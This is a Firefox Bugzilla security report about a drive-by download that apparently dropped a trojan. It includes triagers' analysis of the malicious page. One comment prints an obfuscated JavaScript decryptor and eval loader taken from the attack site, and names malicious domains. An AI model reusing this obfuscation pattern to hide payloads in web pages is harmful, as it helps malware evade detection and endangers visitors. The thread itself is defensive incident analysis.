Closed
Bug 347959
Opened 18 years ago
Closed 17 years ago
Security problem, related to javascript
Categories
(Firefox :: Security, defect)
Tracking
()
RESOLVED
INCOMPLETE
People
(Reporter: tester666, Unassigned)
Details
Attachments
(1 file)
2.04 KB,
text/plain
|
Details |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6 Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6 Fault in javascript security: while searching for bus timetables on a site my antivirus alerted for a file called "ms.exe" dropped onto automatic startup folder. Solutions i found: a. block the browser from opening "http:// js.gbeb.cc / advertizing /" (I used the "hosts" file trick to prevent any browser from browsing that ****.) b. turn javascript off. Notes: I noticed that **** page has a script that's crypted but the string arguments.callee.toString().replace is in clear text. I think it somehow uses that function. Reproducible: Always Steps to Reproduce: Steps: it's already explained in the "details" part. Actual Results: a trojan ("ms.exe") is dropped to the startup folder I dunno what the exe can do but it's not good to have **** dropped to the startup folder. Expected Results: Refuse the action ? It may applies to other Fx versions and related software. Please find a way to fix this. It's possible that many other sites are using such a way. I dunno if this has been reported before, and say "sorry" from now for I'm to lazy to check out,but sincerely I don't have the time to do. I hope this report can be helpful for someone.
Comment 1•18 years ago
|
||
In order for this report to be useful we need to have enough information to reproduce the issue. What site were you browsing that did this? What anti-virus software do you have? When was the last time you updated Windows with security updates? What plugins and extensions and their versions do you have installed? You can find plugins by typing about:plugins in the url bar and you can find the extensions installed in the Tools Extensions menu.
Comment 2•18 years ago
|
||
Comment 3•18 years ago
|
||
The initial evil sets some variables (is appName "Netscape" or not, is Java enabled, EXLogin='itother', etc.) and loads an iframe with abusecenter.org (DON'T LOAD). This is a newly registered domain (26-July-2006) that looks like a copy of the SpamCop abuse reporting form, but includes some more obfuscated code inline. This code uses basically the same decryptor as that above, but the decrypting key ('P') is different and it's passed different content: <script type="text/javascript"> // name="url_check" value="true" document.write('<input name="ref" id="ref" type="hidden" value="'+document.referrer+'">'); function d(xC,P){if(!P){P='8TGDuz:;rl*L&^#dIMg+w|?7,@mtpb2Fi)-UvK0N5jyC/SE41VYRkZAJO(6q.f3=';}var e;var VT='';for(var I=0;I<xC.length;I+=arguments.callee.toString().replace(/\s/g,'').length-535){e=(P.indexOf(xC.charAt(I))&255)<<18|(P.indexOf(xC.charAt(I+1))&255)<<12|(P.indexOf(xC.charAt(I+2))&255)<<(arguments.callee.toString().replace(/\s/g,'').length-533)|P.indexOf(xC.charAt(I+3))&255;VT+=String.fromCharCode((e&16711680)>>16,(e&65280)>>8,e&255);}eval(VT.substring(0,VT.length-(arguments.callee.toString().replace(/\s/g,'').length-537)));}d('@:fUb?ZKtNIEbJljb:w5lRVjtNTZbGTE,?ZKdglZp0VF,A)K,A/-r:KvdglZp0VF,A)K,A/-r;M(p:wfr0)j@:MKt-rib0z/b?wfrNMYb?w-d-pj#Y8i'); </script> This decrypts to an innocuous-looking document.write() of a hidden "url_check" field in the form. Very suspicious, but nothing actually malicious. I wonder if they can tell I'm poking around and serve up alternate content?
Comment 4•18 years ago
|
||
SANS has an article on what appears to be a variant on this, perhaps an earlier version since the replace(/\s/g,'') in this version appears to get around the IE vs Firefox differences noted in the article. http://isc.sans.org/diary.php?storyid=1519
Comment 5•18 years ago
|
||
I should mention that the page that loads the fake spamcop site "abusecenter.org" in an iframe also loads an image with parameters set by the first obfuscated code. <img src=http://e1.extreme-dm.com/s10.g?login=itother&jv=y&j=y&srw=1400&srb=32&l=http%3A//somesite.tld> even though you pass in information about things like whether Java is enabled ("jv=y") it doesn't seem to affect the content of the abusecenter.org site and I'm not seeing where the malware is coming from.
Whiteboard: [sg:needinfo]
(In reply to comment #1) What site were you browsing that did this? It's explained before. What anti-virus software do you have? eWido When was the last time you updated Windows with security updates? every day What plugins and extensions and their versions do you have installed? You can find plugins by typing about:plugins in the url bar and you can find the extensions installed in the Tools Extensions menu. Plugings: npnul32.dll NPSWF32.dll NPOFFICE.DLL (11.0.5510) npdrmv2.dll npdsplay.dll npwmsdrm.dll.
Comment 7•18 years ago
|
||
> What site were you browsing that did this? It's explained before. js.gbeb.cc doesn't appear to contain bus timetables so it can't be the site you were browsing. Since the decrypted code doesn't appear to do anything bad (though it's very suspicious for how little it appears to do) there may be some key parameters passed in from the containing page that don't appear directly in the script you linked. > Plugings: npnul32.dll NPSWF32.dll What version of Flash?
Comment 8•18 years ago
|
||
What version of Windows Media Player are you running, do you have the Microsoft update to fix MS06-006? I saw another site with identical initial exploit format, with a different EXlogin and EXrsrv that eventually downloaded an attack using that flaw. But I never found that code in this case from this particular server when I tried to follow the trail so maybe this is using a different exploit.
Status: UNCONFIRMED → NEW
Ever confirmed: true
Updated•17 years ago
|
Status: NEW → RESOLVED
Closed: 17 years ago
Resolution: --- → INCOMPLETE
Whiteboard: [sg:needinfo]
Updated•17 years ago
|
Group: security
You need to log in
before you can comment on or make changes to this bug.
Description
•